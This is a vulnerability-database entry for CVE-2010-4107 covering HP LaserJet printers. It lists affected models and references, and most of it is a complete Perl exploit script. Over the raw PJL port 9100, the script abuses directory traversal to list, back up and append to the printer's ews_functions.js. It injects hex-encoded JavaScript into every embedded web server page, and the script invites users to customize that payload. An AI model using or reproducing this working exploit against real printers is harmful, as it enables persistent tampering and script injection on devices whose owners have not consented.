ID
VAR-E-201011-0051
CVE
| cve_id: | CVE-2010-4107 | Trust: 2.9 |
EDB ID
32990
TITLE
HP Laser Jet - JavaScript Persistent Cross-Site Scripting via PJL Directory Traversal - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
HP Laser Jet - JavaScript Persistent Cross-Site Scripting via PJL Directory Traversal. CVE-2010-4107 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | hp | model: | laser jet | scope: | - | version: | - | Trust: 1.6 |
| vendor: | hp | model: | laserjet pjl interface | scope: | - | version: | - | Trust: 0.5 |
| vendor: | hp | model: | jetdirect pjl interface universal | scope: | - | version: | - | Trust: 0.5 |
| vendor: | hp | model: | laserjet m9050 mfp | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | hp | model: | laserjet m4345x mfp | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | hp | model: | laserjet m1522n mfp | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | hp | model: | laserjet mfp | scope: | eq | version: | 90500 | Trust: 0.3 |
| vendor: | hp | model: | laserjet 9000mfp | scope: | - | version: | - | Trust: 0.3 |
| vendor: | hp | model: | laserjet | scope: | eq | version: | 9000 | Trust: 0.3 |
| vendor: | hp | model: | laserjet | scope: | eq | version: | 8150 | Trust: 0.3 |
| vendor: | hp | model: | laserjet mfp | scope: | eq | version: | 50350 | Trust: 0.3 |
| vendor: | hp | model: | laserjet 4345mfp | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | hp | model: | laserjet mfp | scope: | eq | version: | 43450 | Trust: 0.3 |
| vendor: | hp | model: | laserjet | scope: | eq | version: | 4300 | Trust: 0.3 |
| vendor: | hp | model: | laserjet | scope: | eq | version: | 4200 | Trust: 0.3 |
| vendor: | hp | model: | laserjet 4100mfp | scope: | - | version: | - | Trust: 0.3 |
| vendor: | hp | model: | laserjet | scope: | eq | version: | 4100 | Trust: 0.3 |
| vendor: | hp | model: | laserjet mfp | scope: | eq | version: | 30350 | Trust: 0.3 |
| vendor: | hp | model: | laserjet series | scope: | eq | version: | 5100 | Trust: 0.3 |
| vendor: | hp | model: | color laserjet cm4730 mfp | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | hp | model: | color laserjet 9500mfp | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | hp | model: | color laserjet mfp | scope: | eq | version: | 60400 | Trust: 0.3 |
| vendor: | hp | model: | color laserjet 4730mfp | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | hp | model: | color laserjet mfp | scope: | eq | version: | 47300 | Trust: 0.3 |
EXPLOIT
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket::INET;
my $host = $ARGV[0];
# Exploit Title: HP Laser Jet Persistent Javascript Cross Site Scripting via PJL
# Google Dork: n/a
# Date: 4/22/14
# Exploit Author: @0x00string
# Vendor Homepage: http://www.hp.com/products1/laserjetprinters/
# Software Link: n/a
# Version: HP LaserJet P/M xxxx (LaserJets with network conectivity, PJL and onboard storage)
# Tested on: P4015n, P2035n, P4014, M3035 MFP, CP 3525, etc.
# CVE : CVE-2010-4107,
# This script will infect all pages on HP laserjets which include ews_functions.js by appending javascript to the ews_functions.js file by leveraging the PJL Directory Traversal
print "\t _______ __ __ _______ _______ _______ _______ ______ ___ __ _ _______
\t| _ || |_| || _ || _ || || || _ | | | | | | || |
\t| | | || || | | || | | || _____||_ _|| | || | | | |_| || ___|
\t| | | || || | | || | | || |_____ | | | |_||_ | | | || | __
\t| |_| | | | | |_| || |_| ||_____ | | | | __ || | | _ || || |
\t| || _ || || | _____| | | | | | | || | | | | || |_| |
\t|_______||__| |__||_______||_______||_______| |___| |___| |_||___| |_| |__||_______|
\t HP Laser Jet persistent Javascript XSS
\t via PJL Dir Trav\n\n";
$| = 1;
infect($host);
sub infect {
my $co = 0;
my (@returned, $temp, @files, @sizes, $size, $data);
my $socket = new IO::Socket::INET (
PeerHost => $host,
PeerPort => '9100',
Proto => 'tcp',
) or die $!;
if ($socket) {
$data =
"\x1b\x25\x2d\x31\x32".
"\x33\x34\x35\x58\x40".
"\x50\x4a\x4c\x20\x46".
"\x53\x44\x49\x52\x4c".
"\x49\x53\x54\x20\x4e".
"\x41\x4d\x45\x20\x3d".
"\x20\x22\x30\x3a\x5c".
"\x5c\x77\x65\x62\x53".
"\x65\x72\x76\x65\x72".
"\x5c\x5c\x68\x6f\x6d".
"\x65\x5c\x5c\x6a\x73".
"\x66\x69\x6c\x65\x73".
"\x5c\x5c\x22\x20\x45".
"\x4e\x54\x52\x59\x3d".
"\x31\x20\x43\x4f\x55".
"\x4e\x54\x3d\x39\x39".
"\x39\x0a\x0d\x1b\x25".
"\x2d\x31\x32\x33\x34\x35\x58";
#print "\n$data\n";
$socket = tx($socket, $data);
($socket, $temp) = rx($socket);
#print "\n$temp\n";
@returned = split('\n', $temp);
foreach(@returned) {
if ($_ =~ /(.*?)\ TYPE\=FILE\ SIZE\=(\d{1,99})/) {
push(@files, $1);
push(@sizes, $2);
}
}
}
my $two = 0;
foreach(@files) {
if ($_ =~ /RestrictColor\.js/ || $_ =~ /ews_functions\.js/) {
$two++;
}
}
if ($two > 1) {
if ($socket) {
while ($co < scalar(@files)) {
if ($files[$co] =~ /ews/) {
$size = $sizes[$co];
$data =
"\x1b\x25\x2d\x31\x32\x33\x34\x35\x58".
"\x40\x50\x4a\x4c\x20\x46\x53\x55\x50".
"\x4c\x4f\x41\x44\x20\x4e\x41\x4d\x45".
"\x20\x3d\x20\x22\x30\x3a\x5c\x5c\x77".
"\x65\x62\x53\x65\x72\x76\x65\x72\x5c".
"\x5c\x68\x6f\x6d\x65\x5c\x5c\x6a\x73".
"\x66\x69\x6c\x65\x73\x5c\x5c\x65\x77".
"\x73\x5f\x66\x75\x6e\x63\x74\x69\x6f".
"\x6e\x73\x2e\x6a\x73\x22\x20\x4f\x46".
"\x46\x53\x45\x54\x3d\x30\x20\x53\x49".
"\x5a\x45\x20\x3d\x20" . $size.
"\x0d\x0a";
}
$co++;
}
$temp = undef;
#print "\n$data\n";
$socket = tx($socket, $data);
$data = undef;
if ($socket) {
($socket, $temp) = rx($socket, $size);
#print "\n$temp\n";
my @original = split('\n', $temp);
$temp = "";
shift(@original);
foreach(@original) {
$temp = $temp . $_ . "\n";
}
#print $temp;
}
}
}
$data =
"\x1b\x25\x2d\x31\x32\x33\x34\x35\x58".
"\x40\x50\x4a\x4c\x20\x46\x53\x41\x50".
"\x50\x45\x4e\x44\x20\x46\x4f\x52\x4d".
"\x41\x54\x3a\x42\x49\x4e\x41\x52\x59".
"\x20\x4e\x41\x4d\x45".
"\x20\x3d\x20\x22\x30\x3a\x5c\x5c\x77".
"\x65\x62\x53\x65\x72\x76\x65\x72\x5c".
"\x5c\x68\x6f\x6d\x65\x5c\x5c\x6a\x73".
"\x66\x69\x6c\x65\x73\x5c\x5c\x65\x77".
"\x73\x5f\x66\x75\x6e\x63\x74\x69\x6f".
"\x6e\x73\x2e\x42\x41\x4b".
"\x22\x20\x53\x49\x5a\x45\x20\x3d\x20".
length($temp) . "\x0d\x0a". $temp.
"\x1b\x25\x2d\x31\x32\x33\x34\x35\x58";
#print $data;
if ($socket) {
#print "\n$data\n";
$socket = tx($socket, $data);
($socket, $temp) = rx($socket);
#print "\n$temp\n";
}
if ($socket) {
$data =
"\x1b\x25\x2d\x31\x32\x33\x34\x35\x58".
"\x40\x50\x4a\x4c\x20\x46\x53\x51\x55".
"\x45\x52\x59\x20\x4e\x41\x4d\x45\x20".
"\x3d\x20\x22\x30\x3a\x5c\x5c\x77\x65".
"\x62\x53\x65\x72\x76\x65\x72\x5c\x5c".
"\x68\x6f\x6d\x65\x5c\x5c\x6a\x73\x66".
"\x69\x6c\x65\x73\x5c\x5c\x65\x77\x73".
"\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e".
"\x73\x2e\x42\x41\x4b\x22\x0d\x0a";
#print "\n$data\n";
$socket = tx($socket, $data);
($socket, $temp) = rx($socket);
#print "\n$temp\n";
exit(0) unless ($temp =~ /ews\_functions\.BAK/);
}
if ($socket) {
my $payload =
"\x76\x61\x72\x20\x65\x78\x70\x6c\x6f".
"\x69\x74\x20\x3d\x20\x64\x6f\x63\x75".
"\x6d\x65\x6e\x74\x2e\x63\x72\x65\x61".
"\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74".
"\x28\x22\x64\x69\x76\x22\x29\x3b\x20".
"\x65\x78\x70\x6c\x6f\x69\x74\x2e\x69".
"\x6e\x6e\x65\x72\x48\x54\x4d\x4c\x20".
"\x3d\x20\x27\x3c\x64\x69\x76\x3e\x3c".
"\x66\x6f\x6e\x74\x20\x73\x69\x7a\x65".
"\x3d\x35\x30\x3e".
"\x41\x41\x41\x41" . "\x3c". # <--- this is being added to the page as an element. put whatever you'd like here, but check your lengths!
"\x2f\x66\x6f\x6e\x74\x3e\x3c\x2f\x64".
"\x69\x76\x3e\x27\x3b\x20\x64\x6f\x63".
"\x75\x6d\x65\x6e\x74\x2e\x67\x65\x74".
"\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42".
"\x79\x54\x61\x67\x4e\x61\x6d\x65\x28".
"\x27\x62\x6f\x64\x79\x27\x29\x5b\x30".
"\x5d\x2e\x61\x70\x70\x65\x6e\x64\x43".
"\x68\x69\x6c\x64\x28\x65\x78\x70\x6c".
"\x6f\x69\x74\x29\x3b";
$data =
"\x1b\x25\x2d\x31\x32\x33\x34\x35\x58".
"\x40\x50\x4a\x4c\x20\x46\x53\x41\x50".
"\x50\x45\x4e\x44\x20\x46\x4f\x52\x4d".
"\x41\x54\x3a\x42\x49\x4e\x41\x52\x59".
"\x20\x4e\x41\x4d\x45\x20\x3d\x22\x30".
"\x3a\x5c\x5c\x77\x65\x62\x53\x65\x72".
"\x76\x65\x72\x5c\x5c\x68\x6f\x6d\x65".
"\x5c\x5c\x6a\x73\x66\x69\x6c\x65\x73".
"\x5c\x5c\x65\x77\x73\x5f\x66\x75\x6e".
"\x63\x74\x69\x6f\x6e\x73\x2e\x6a\x73".
"\x22\x20\x53\x49\x5a\x45\x20\x3d\x20".
length($payload) . "\x0d\x0a". $payload.
"\x1b\x25\x2d\x31\x32\x33\x34\x35\x58";
$socket = tx($socket, $data);
exit(0);
}
}
sub tx {
my $socket = shift;
my $data = shift;
$socket->send($data) or die $!;
return $socket;
}
sub rx {
my $socket = shift;
my $second_size = shift;
unless ($second_size) {
$second_size = 2048;
}
my $data = undef;
eval {
local $SIG{ALRM} = sub { die 'Timed Out'; };
alarm 10;
$socket->recv($data, 2048);
if ($data) {
while (length($data) < (length($data) + $second_size)) {
my $moar;
$socket->recv($moar, length($second_size + 1));
$data = $data . $moar;
}
alarm 0;
return ($socket, $data);
}
};
alarm 0;
return($socket, $data);
}
Trust: 1.0
EXPLOIT LANGUAGE
pl
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
JavaScript Persistent Cross-Site Scripting via PJL Directory Traversal
Trust: 1.0
TAGS
| tag: | exploit | Trust: 1.0 |
| tag: | file inclusion | Trust: 0.5 |
CREDITS
@0x00string
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2010-4107 | Trust: 3.5 |
| db: | EXPLOIT-DB | id: | 32990 | Trust: 1.6 |
| db: | 0DAYTODAY | id: | 14994 | Trust: 0.6 |
| db: | EDBNET | id: | 14974 | Trust: 0.6 |
| db: | EDBNET | id: | 54488 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 96205 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 103777 | Trust: 0.5 |
| db: | BID | id: | 44882 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2010-4107 | Trust: 2.6 |
| url: | https://0day.today/exploits/14994 | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/32990/ | Trust: 0.6 |
| url: | http://www.nruns.com/_downloads/sa-2010%20003-hewlett-packard.pdf | Trust: 0.3 |
| url: | https://www.itrc.hp.com/service/cki/docdisplay.do?docid=emr_na-c02004333 | Trust: 0.3 |
| url: | http://www.hp.com/ | Trust: 0.3 |
SOURCES
| db: | BID | id: | 44882 |
| db: | PACKETSTORM | id: | 96205 |
| db: | PACKETSTORM | id: | 103777 |
| db: | EXPLOIT-DB | id: | 32990 |
| db: | EDBNET | id: | 14974 |
| db: | EDBNET | id: | 54488 |
LAST UPDATE DATE
2022-07-27T09:19:24.138000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 44882 | date: | 2014-05-06T01:11:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 44882 | date: | 2010-11-15T00:00:00 |
| db: | PACKETSTORM | id: | 96205 | date: | 2010-11-30T00:29:27 |
| db: | PACKETSTORM | id: | 103777 | date: | 2011-08-07T17:05:41 |
| db: | EXPLOIT-DB | id: | 32990 | date: | 2014-04-23T00:00:00 |
| db: | EDBNET | id: | 14974 | date: | 2010-11-30T00:00:00 |
| db: | EDBNET | id: | 54488 | date: | 2014-04-23T00:00:00 |